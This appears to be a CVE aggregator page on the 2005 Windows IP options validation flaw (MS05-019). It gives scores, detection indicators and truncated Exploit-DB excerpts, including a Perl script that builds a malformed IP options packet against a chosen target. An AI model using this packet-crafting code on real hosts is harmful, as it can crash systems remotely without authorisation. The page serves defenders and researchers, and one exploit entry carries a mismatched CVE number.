CVE-2005-0048
published 2005-05-02CVE-2005-0048: Microsoft Windows XP SP2 and earlier, 2000 SP3 and SP4, Server 2003, and older operating systems allows remote attackers to cause a denial of service and…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
45.52%
98.6th percentile
Microsoft Windows XP SP2 and earlier, 2000 SP3 and SP4, Server 2003, and older operating systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IP packets with malformed options, aka the "IP Validation Vulnerability."
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
IP options field: option byte + size byte 0x27 (39) + 38 bytes payload
- →Look for IPv4 TCP SYN packets with a 60-byte IP header (ip_hl=15, indicating maximum IP options of 40 bytes) sent to arbitrary destination ports — characteristic of the PoC exploit traffic pattern. ↗
- →The exploit sends the malformed packet 5 times in rapid succession to the target; repeated identical malformed-options packets from the same source may indicate exploitation attempts. ↗
- ·The immediate observable consequence of exploitation is a denial of service (crash), though remote code execution has been reported as a potential outcome. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)
exploitdb·2005-04-17
CVE-2005-0688 Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)
Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)
---
/* ecl-winipdos.c - 16/04/05
* Yuri Gushin
* Alex Behar
*
* This one was actually interesting, an off-by-one by our beloved
* M$ :)
*
* When processing an IP packet with an option size (2nd byte after
* the option) of 39, it will crash - since the maximum available
* size is 40 for the whole IP options field, and two are already used:
* [ OPT ] [ SIZE ] [ 38 more bytes ]
* Checks are done to validate that the option-size field is less than
* 40, where a value less than !39! should be checked for validation.
*
* Note that this doesn't affect ALL options, and is also dependant upon
* the underlying protocol.
* Anyways, a small PoC to see how it works and why, tweak test and
* explore, have fun :)
*
*
* Greets fly out
Exploit-DB
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)
exploitdb·2005-04-16
CVE-2005-0048 Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)
---
// source: https://www.securityfocus.com/bid/13116/info
Microsoft Windows is reported prone to a remote code execution vulnerability. It is reported that the vulnerability manifests when an affected Microsoft platform receives and processes an especially malformed TCP/IP packet.
Reports indicate that the immediate consequences of exploitation of this issue are a denial of service.
/* ecl-winipdos.c - 16/04/05
* Yuri Gushin
* Alex Behar
*
* This one was actually interesting, an off-by-one by our beloved
* M$ :)
*
* When processing an IP packet with an option size (2nd byte after
* the option) of 39, it will crash - since the maximum available
* size is 40 for the whole IP options field, and two are a
Exploit-DB
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)
exploitdb·2005-04-12
CVE-2005-0048 Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)
---
source: https://www.securityfocus.com/bid/13116/info
Microsoft Windows is reported prone to a remote code execution vulnerability. It is reported that the vulnerability manifests when an affected Microsoft platform receives and processes an especially malformed TCP/IP packet.
Reports indicate that the immediate consequences of exploitation of this issue are a denial of service.
#!/usr/bin/perl
use strict;
use warnings;
my %opts;
use Getopt::Std;
getopts('t:p:', \%opts);
die("Usage: $0 -t TARGET -p PORT\n") unless $opts{t} && $opts{p};
use Net::Pkt;
$Env->debug(3);
my $frame = Net::Packet::Frame->new(
l3 => Net::Packet::IPv4->new(
dst => $opts{t},
options => "\x03\x27". 'G'x38,
),
l4 => Net::Pack
No writeups or analysis indexed.
http://www.kb.cert.org/vuls/id/233754http://www.us-cert.gov/cas/techalerts/TA05-102A.htmlhttp://xforce.iss.net/xforce/alerts/id/192https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-019https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1744https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A3824https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4549http://www.kb.cert.org/vuls/id/233754http://www.us-cert.gov/cas/techalerts/TA05-102A.htmlhttp://xforce.iss.net/xforce/alerts/id/192https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-019https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1744https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A3824https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4549
2005-05-02
Published